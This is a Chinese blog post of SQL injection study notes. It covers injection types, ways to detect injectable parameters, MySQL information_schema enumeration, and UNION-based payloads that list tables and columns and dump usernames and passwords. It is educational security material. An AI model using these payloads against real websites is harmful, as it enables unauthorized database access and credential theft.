SQL注入基础

最新推荐文章于 2024-03-10 15:41:53 发布
最新推荐文章于 2024-03-10 15:41:53 发布
阅读量91 收藏
点赞数 1
分类专栏: 笔记 文章标签: mysql
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/designer545/article/details/118654581
版权

SQL

SQL注入是网站存在最多也是最简单的漏洞,主要原因是程序员在开发用户和数据库交互的系统时没有对用户输入的字符串进行过滤,转义,限制或处理不严谨,导致用户可以通过输入精心构造的字符串去非法获取到数据库中的数据。

SQL分类

1、按注入数据类型
字符型 整型
2、按注入手法分类
联合查询型注入
报错型注入
布尔型注入
基于时间延迟注入

查询是否可注入

1、输入 ’ 看回显, 报错则可注入
2、输入 1 and 1 =1 查询成功 接着输入1 and 1 = 2 查询失败 即为整型注入
3、输入 1’ and 1=1# 查询成功 输入1’ and 1=2# 查询失败 则为字符型注入
4、and sleep(5) (判断页面返回时间)

查询有几个字段

1‘ order by 1/2…

mysql中的注释符号

1、# (url编码为%23)
2、-- (有个空格)
3、//

MySQL中的information_schema数据库

character_sets表 :提供了mysql可用字符集的信息 show character set;命令从这个表获取结果

schema表:提供当前mysql实例中所有数据库的信息 show databases;命令从这个表获取数据
字段:SCHEMA_NAME

select group_concat(SCHEMA_NAME) from information_schema.SCHEMATA
————————————————

tables表:存储数据库中的表信息(包括视图),包括表属于哪个数据库,表的类型、存储引擎、创建时间等信息。
SHOW TABLES FROM XX; 命令从这个表获取结果。
字段:TABLE_SCHEMA, TABLE_NAME

select group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA= xx

columns表:存储表中的列信息,包括表有多少列、每个列的类型等。SHOW COLUMNS FROM xx; 命令从这个表获取结果。
字段:TBALE_SCHEMA,TABLE_NAME,COLUMN_NAME

select group_concat(COLUMN_NAME) from information_schema.COLUMNS where
TABLE_SCHEMA=xx and TABLE_NAME=xx

statistics表:表索引的信息。SHOW INDEX FROM xx; 命令从这个表获取结果。

user_privileges表:用户权限表。内容源自 mysql.user 授权表。是非标准表。

schema_privileges表:方案权限表。给出了关于方案(数据库)权限的信息。内容来自 mysql.db 授权表。是非标准表。

table_privileges表:表权限表。给出了关于表权限的信息。内容源自 mysql.tables_priv 授权表。是非标准表。

column_privileges表:列权限表。给出了关于列权限的信息。内容源自 mysql.columns_priv 授权表。是非标准表。

COLLATIONS 表:提供了关于各字符集的对照信息。SHOW COLLATION; 命令从这个表获取结果。

常用查询函数

user() 当前用户名
database()当前数据库
@@version版本号
session_user()返回当前mysql连接的用户名和主机名
@@basedir mysql安装路径
@@datadir 数据库文件安装路径
@@version_compile_os 操作系统版本

limit 将查询结果一个一个输出
select xx from xx limit 1,2
group_concat 一次性全部显示
select group_concat(xx) from xx

联合查询

联合查询相当于把别的表的数据查询结果显示到当前表,使用联合查询时,必须使得两张表的表结构一致,因此我们需要判断当前表的列数有多少列
UNION必须由两条或两条以上的SELECT语句组成,语句之间用关键字UNION分隔
UNION中的每个查询必须包含相同的列。
UNION会从查询结果集中自动去除了重复行。

常用语句

1’ union select user(),database()#

获取数据库中的表
1’ union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#

获取表中的字段名
1’ union select 1, group_concat(column_name) from information_schema.columns where table_name=‘xx’#

输出数据
1’ union select user,password from users#
在这里插入图片描述

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

designer545
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
收集的一些DB2错误编码
sjeveryday的专栏
12-10 1439
根据错误编码可以在DB2的命令行中输入:db2 ? sqlXXXXn 即可获得错误编码的详细信息。 下面是收集的错误编码信息 DB2错误信息(按sqlcode排序) sqlcode         sqlstate         说明 000          00000          SQL语句成功完成                 01xxx         SQL语句成...
sql注入基础
zydbk123456的博客
10-21 541
sql注入基础 #0x01sql语句基础: 1.select语句 格式: select * from table(从table表中获取字段信息) select * from table where (在满足where后的条件下查询字段信息) 2.insert语句 格式: insert into table(field1,field2) values(value1,value2) 3.update语...
sql中常见sqlcode原因分析
热门推荐
zhh0921的博客
09-20 3万+
000 | 00000 | SQL语句成功完成  01xxx | SQL语句成功完成,但是有警告  +012 | 01545 | 未限定的列名被解释为一个有相互关系的引用  +098 | 01568 | 动态SQL语句用分号结束  +100 | 02000 | 没有找到满足SQL语句的行  +110 | 01561 | 用DATA CAPTURE定义的表的更新操作不能发送到原来的子系统
sql注入基础学习
qq_48257021的博客
03-10 1318
4.判断一下数据库中的表,网址后加上:and (select count(*) from admin) 0返回正常,说明存在admin表。and (select count(*) from admin where ascii(substr(name,2,1))>=100)=1 结果为100,即字符d,重复上述过程,可以判断出帐号为admin。and (select count(*) from admin where ascii(substr(pwd,1,1))>=97)=1,返回正常,为字符a。
SQL注入 基础
04-30
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。
SQL注入基础知识
01-18
SQL注入基础知识的学习,可以对你有很大的帮助,避免在开发过程中出现更多的安全问题
SQL注入基础.pdf
07-05
介绍SQL注入的原理,常见入侵与防御方式,手工注入或者工具注入
SQL注入基础整理及Tricks总结1
08-03
SQL注入基础与技巧总结】 SQL注入是一种常见的网络安全漏洞,攻击者通过在应用程序的输入字段中插入恶意SQL代码,以获取未授权的数据访问或控制服务器。以下是对标题和描述中提到的知识点的详细说明: 一、联合...
SQL注入基础和进阶.pdf
12-26
"SQL注入基础和进阶" SQL注入是指Web应用程序对用户输入的数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,那么攻击者可以通过构造不同的SQL语句来实现对数据库的任意操作。开发...
sql注入基础知识.rar
最新发布
04-17
sql注入 SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗...
Sql注入基础原理介绍(超详细)
weixin_30325487的博客
09-06 4302
一、Sql注入简介 Sql 注入攻击是通过将恶意的 Sql 查询或添加语句插入到应用的输入参数中,再在后台 Sql 服务器上解析执行进行的攻击,它目前黑客对数据库进行攻击的最常用手段之一。 二、Web 程序三层架构 三层架构(3-tier architecture) 通常意义上就是将整个业务应用划分为: 界面层(User Interface layer) 业务逻辑层(Business Logic...
SQL注入基础总结
IerkeU的博客
12-09 4208
一、什么是SQL注入? 答:SQL注入是比较常见的网络攻击方式之一,它不是利用OS的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句实现无账号登陆,甚至篡改数据库。 二、SQL注入的原理? 答:SQL注入攻击通过构建特殊的输入语句作为参数传入web应用程序,指的是服务器对用户输入数据过滤不严,导致服务器SQL语句被恶意篡改并成功 SQL注入的危害? 当我们访问动态网页时, Web 服务器会向数据访问层发起 Sql 查询请求,如果权限验证通过就会执行 Sql 语句。 SQL注入带来的危害主要有如
SQL注入基础2.pdf
07-30
SQL注入基础2,提供给菜鸟使用。本材料对于网络攻防演练学习有很重要的学习。
SQL注入基础操作篇.pdf
09-19
在本文中,我们将深入探讨SQL注入基础知识,以"SQL注入基础操作篇.pdf"为引导,讲解如何识别和利用这种漏洞。 首先,我们通过一个具体的例子来理解SQL注入。假设有一个网站的论坛登录页面,用户输入用户名和密码...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值